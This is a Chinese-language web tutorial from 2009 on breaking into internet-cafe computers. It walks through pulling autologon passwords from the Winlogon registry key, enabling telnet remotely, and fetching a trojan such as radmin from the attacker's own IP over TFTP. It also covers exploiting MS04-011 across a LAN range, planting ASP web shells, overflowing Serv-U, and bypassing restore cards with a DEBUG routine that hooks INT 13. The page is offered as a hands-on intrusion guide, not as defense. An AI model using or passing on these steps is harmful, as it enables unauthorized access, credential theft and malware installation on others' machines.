当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 攻无不克决战网吧入侵

安全基础
黑客攻击行为的特征分析及反攻击技术
Windows 2000中隐患重重的十大“服务”
网页脚本攻击防范全攻略
防患于未然 轻松做好Windows 2000安全策略
用注册表为操作系统砌九堵安全墙
完善网站程序 脚本攻击防范策略完全篇
两步修改XP远程管理默认端口可防止入侵
消除Windows XP自身的安全隐患
保护Windows不受恶意代码攻击
如何关闭和限制电脑不用的端口
修改Windows 2000远程终端默认端口
操作系统被入侵后的修复过程
利用微软基准安全分析器打造你安全的系统
数字签名技术简介
检测和删除系统中的木马
QQ密码破解程序
P2P中保障Windows网络安全
在代码中查找安全性缺陷的专家提示
QQ安全的三大纪律八项注意
如何保证文件夹的绝对安全

安全基础 中的 攻无不克决战网吧入侵


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 82 ::
收藏到网摘: n/a

  一. 网吧入侵

  入侵的方法很多,但对网吧入侵最常用的方法是什么呢?首先,自动登陆。现在网吧一般都是win2000或者windows xp的机器,网管一般都把机子设置为自动登陆!

  这样我们开机进入系统的时候登陆窗口一闪而过!着时候如果我们findfass.exe试图把登陆账号密码找出来是不会成功的!因为账号密码根本不在内存中,而findfass.exe通过winlogon的PID号和正确的域名中,在内存寻找好段加了密的内存块(保存着加密过的登陆密码),然后对它进行解密,这样就能得到明文的密码。实际上自动登陆的账号密码都在注册表中。我们打开注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\这个目录下,AutoAdminLogon这一项的键值为1,表示自动登陆。

  为1的时候,打开控制面板的用户和密码,会发现需要密码前面的钩已经去掉了。DefaultUserName对应的键值就是登陆用户名,DefaultPassword对应的键值就是登陆密码。实际上海洋顶端木马2006就有着一功能,原理是一样的,不过因为权限的问题,不一定能读出来。这样,密码账号我们都找出来了。而且你要知道,一个网吧的自动登陆密码账号一般都是一样的,而且网管为了方便网虫上网一般把他们设置在管理员组,至少user组。

  知道了密码账号还愁入侵不了么?网吧机子的server服务一般是禁用的,那我们就不能用ipc入侵了。opentelnet.exe我们也用不了,因为着个也依赖ipc连接,dameware远程控制也不行,道理一样。我们可以用recton着个小巧实用的工具来开telnet,这个工具在win2000下面特别好使。如图1。

  开了telnet后,我们telnet上去,先在本机打开tftpd32.exe,再telnet下面telnet -i myip get 3721.exe c:\3721.exe,这样就把我们的木马3721.exe比如radmin传过去了。如图2。再在telnet下面直接运行3721.exe就ok了。

  另一个方法就是ms04011漏洞,别以为着个漏洞已经过时了,在网吧这个漏洞还是相当普遍的,许多网吧的网管只会装游戏,重装系统,不重视着写漏洞,懒得打补丁!我们用DSScan扫描192.168.0.1-192.168.0.255,一般会你会很惊喜的。我们到用ms04011溢出工具溢出,一下子就得到了系统权限。

  还有很多入侵方法,你可以把xscan搬出来扫描一下。很多菜鸟喜欢用啊D工具包来扫网吧的空口令,实际上这个工具扫用户账号密码很弱,以前我试过,我用上面第一种方法发现网吧都有一个密码为空的管理员账号,用啊D工具包只扫出几台机子有这个账号。我经常用我的最爱闪电狐——火狐端口扫描器来扫一下网吧主机,第一服务器等。着个扫描器速度很快,扫1到10000端口也要不了几分钟。如果发现服务器开80断口,自然是看是不是架设了网站。再看网站十分有漏洞,想办法传个asp木马上去提升权限。如果发现电影服务器装了serv_u,而且你有了一个账号,可以尝试一下serv_u的溢出。

  二.网吧木马

  在网吧安装木马最重要的是把它的还原破了,现在网吧的还原系统一般有3种,即还原卡,还原精灵,冰点还原精灵。硬盘还原卡其实所谓硬盘保护卡就是在ROM中写了一段HOOK INT 13的程序,屏蔽了

  一些功能调用如AH=3,5等,在中断向量表中INT 13的SEG,OFFSET

  描述为[13h*4+2],[13h*4],将此中的程序先保存后,再替换为自己的代码,

  当你AH=2的时,它便会call原始INT 13地址来完成(商周)作.

  只要找到原始INT 13入口便可以为所欲为.

  具体过程如下:

  开机过程按住F8键,进入纯dos环境, 注";"后为注释.

  出现提示符c:,

  键入c:\debug,

  - a100

  - xor ax,ax

  - int 13

  - int3

  ; 寻找原始的int 13入口.